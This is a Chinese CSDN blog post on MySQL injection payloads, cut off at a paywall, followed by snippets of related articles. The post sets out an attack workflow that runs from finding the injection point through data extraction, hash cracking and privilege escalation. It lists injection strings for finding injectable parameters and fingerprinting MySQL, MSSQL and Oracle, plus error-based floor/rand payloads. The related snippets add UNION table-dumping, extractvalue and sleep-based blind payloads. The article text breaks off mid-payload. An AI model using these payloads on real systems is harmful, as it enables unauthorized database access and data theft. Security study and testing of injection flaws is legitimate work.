MySQL注入--Payload

最新推荐文章于 2024-04-10 09:36:34 发布
最新推荐文章于 2024-04-10 09:36:34 发布
阅读量1.1k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37595954/article/details/102749293
版权

MySQL注入--Payload

Mirror王宇阳

2019-10-22

SQL的注入流程一般如下:

1、判断是否有SQL注入漏洞(判断注入点)

2、判断 数据库的系统架构、数据库名、web应用类型等

3、获取数据库信息

4、加密信息破解

5、进行提权

前篇

注入漏洞分类:

数字型注入:

当输入(注入)的参数为整数,则可以认为该漏洞注入点为数字型注入;

http://192.168.2.172/index.php/?id=8

在后端中SQL语句构成如下:

select * from user where id=8;
字符型注入:

当输入(注入)的参数为字符/串时可以认定为是字符型注入漏洞

其它注入:

POST注入:注入字段在POST数据中

Cookie注入:注入字段在Cookie数据中

延迟注入:使用数据库延迟特性进行注入

搜索注入:在搜索栏中利用恶意代码进行注入

base64注入:注入字符串经过base64加密

判断注入点

' or 1=1 #

and 1=1 #
and '1'='1' #
1') and ('1=1') #
url/?id=1/1
url/?id=1/0

判断数据库系统类型

PHP搭建的Web应用后端为MySQL

JSP搭建的Web应用后端为Oracle

ASP搭建的Web应用后端为MSSQL

MySQL

字符串连接判断:

?id=1 and '1'+'1' = '11'
?id=1 and concat('1','1')='11'

判断数据库的系统库表:

' and (select count(*) from information_schema.tables)>0 and 1=1

MSSQL

默认变量:

'?; select @@servername--+

字符串连接判断:

?id=1 and '1'+'1'='11'

数据库系统表判断:

' and (select count(*) from sysobjects)>0 and 1=1

Oracle

系统表判断:

' and (select count(*) from sys.user_tables)>0 and 1=1

字符串连接判断:

and '1'||'1' = '11'
and concat('1','1')='11'

MySQL注入姿势payload

报错注入

语句执行后返回异常信息,这些异常信息包含了重要数据

floor报错注入:

floorgroup by配合使用group by的key唯一性和编码顺序导致二次执行产生不同大的key

' and select count(*) from table group by floor(rand(0))*2 #

union select 1,count(*),concat(0x7e,0x7e,(sel
最低0.47元/天 解锁文章
m0_37595954
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL_Injection_Payload:SQL注入有效负载列表
01-28
SQL_Injection_Payload:SQL注入有效负载列表
SQL注入Playload List
qq_52014772的博客
07-22 1119
SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询。 SQL注入类型 类型 描述 In-band SQLi (Classic SQLi) In-band SQLi注入是SQL注入攻击中最常见和最容易利用的。当攻击者能够使用相同的查询发起攻击并收集结果时,就会发生In-band SQLi注入。In-band SQLi注入的两种最常见类型是基于错误的SQLi和基于联合的SQLi。 Error-based SQLi 基于错误的SQLi是一种In-band..
XXE注入payload列表:技术解析与应用指南
最新发布
gitblog_00093的博客
04-10 447
XXE注入payload列表:技术解析与应用指南 项目地址:https://gitcode.com/payloadbox/xxe-injection-payload-list ![](https://gitcode.net payloadbox/xxe-injection-payload-list/mascot.svg?width=64&height=64) 在Web安全领域,XML Ex...
sql注入payload
专注企业信息安全-sec
04-12 3871
分享一些平时测试用的sql payloads 1:BOOL SQLINJECTION \ ' " %df' %df" and 1=1 and 1=2 ' and '1'='1 ' and '1'='2 " and "1"="1 " and "1"="2 ) and (1=1 ) and (1=2 ') and ('1'='1 ') and ('1'='2 %' and 1=1 and '%'...
payload sql注入_SQL注入 payload 记录
weixin_39918588的博客
01-14 105
使用 REGEXP盲注payloadselect user() from users where user_id=1 and (select(user)from users where user_id=1) REGEXP "^adm.*";来源https://www.secpulse.com/archives/68991.html使用 (子查询) in ("x") 盲注Payload通过 mid ...
第十九节 宽字节SQL注入-01
09-15
我们使用的payload是“id=%df'”,这个payload将被MYSQL认为是一个宽字符,从而使得攻击者可以inject恶意SQL代码。 Sqlmap安全检测 在Sqlmap安全检测中,我们使用了Sqlmap工具来检测宽字节SQL注入漏洞。我们使用的...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
D3CTF2022-官方WriteUp1
08-03
MySQLInject 是一种 SQL 注入攻击技术,攻击者可以通过注入恶意的 SQL 语句来攻击 MySQL 数据库。在本题中,使用 mybatis 框架来生成 SQL 语句,攻击者可以通过注入恶意的 SQL 语句来攻击数据库。 4. Web 短链技术 ...
dotnet-一个基于aspnetcore2xmysqljwt开发的webapi项目
08-15
在2.x版本中,ASP.NET Core引入了更多的功能和完善,比如改进的依赖注入容器、更强大的中间件系统以及更好的性能优化。 MySQL是一个广泛使用的开源关系型数据库管理系统,以其高效、稳定和易于管理著称。在这个项目...
sql注入payloads
three_feng的博客
11-02 641
mysql> select * from user where name='bush'+(select * from (select(sleep(3)))a)+'';
mysql注入大全讲解(很详细哦)
07-24
mysql注入大全讲解(很详细哦),可以学习一下啊,比较全面了
手工SQL注入payload
山兔的博客
03-17 294
and sleep(5)(判断页面返回时间)-1/+1 回显上下页(整形)单引号(字符型/整形)
【WEB安全】SQL注入 payload
qq_42322144的博客
12-16 2994
'"!@#)\(/?; ' " OR 1=1 OR 1=0 OR 1=1 -- OR 1=0 -- ' OR '1'='1 ' OR '1'='0 ' OR 1=1 -- ' OR 1=0 -- " OR "1"="1 " OR "1"="0 " OR 1=1 -- " OR 1=0 -- ") OR 1=1 -- ") OR 1=0 -- ') OR 1=1 -- ') OR 1=0 -- AND 1=1 AND 1=0 AND 1=1 -- AND 1=0 --
payload sql注入_sql注入之payload
weixin_29911569的博客
01-14 599
/**GET,post*有返回**/基于报错的SQL注入1、获取字段数' order by 5 --+2、获取表名0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+select group_concat(table_name) fr...
SQL注入payload(持续更新)
Zeker62的博客
08-31 2621
id='1' order by 3 --+ //%20是空格,%23是# id='2' and 1=2 union select 1,2,datbase()--+ //查数据库 id='3' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ //查表 id='4' and 1=2 union select 1,2,group_co
mysql数据库之报错注入常用payload
Websec
02-20 1389
flloor报错注入 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);   ExtractValue报错注入 and extractvalue(1, concat(0x5c, (select table_na...
SQL注入-SQLi-LABS靶场1-65完整payload
问彡心的博客
12-27 1152
【代码】SQL注入-SQLi-LABS靶场1-65完整payload。
sql注入payload总结
recover517的博客
03-04 8555
个人经验加网上的wp总结的注入类型,附上sqlmap命令
mysql payload
10-01
MySQL payload是指在使用MySQL数据库时,通过特定的语句或代码来执行一系列恶意操作的数据。它可以被用来进行各种攻击,例如注入攻击、拒绝服务攻击等。如引用中所示,可以通过构建恶意的SQL语句来实现注入攻击。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值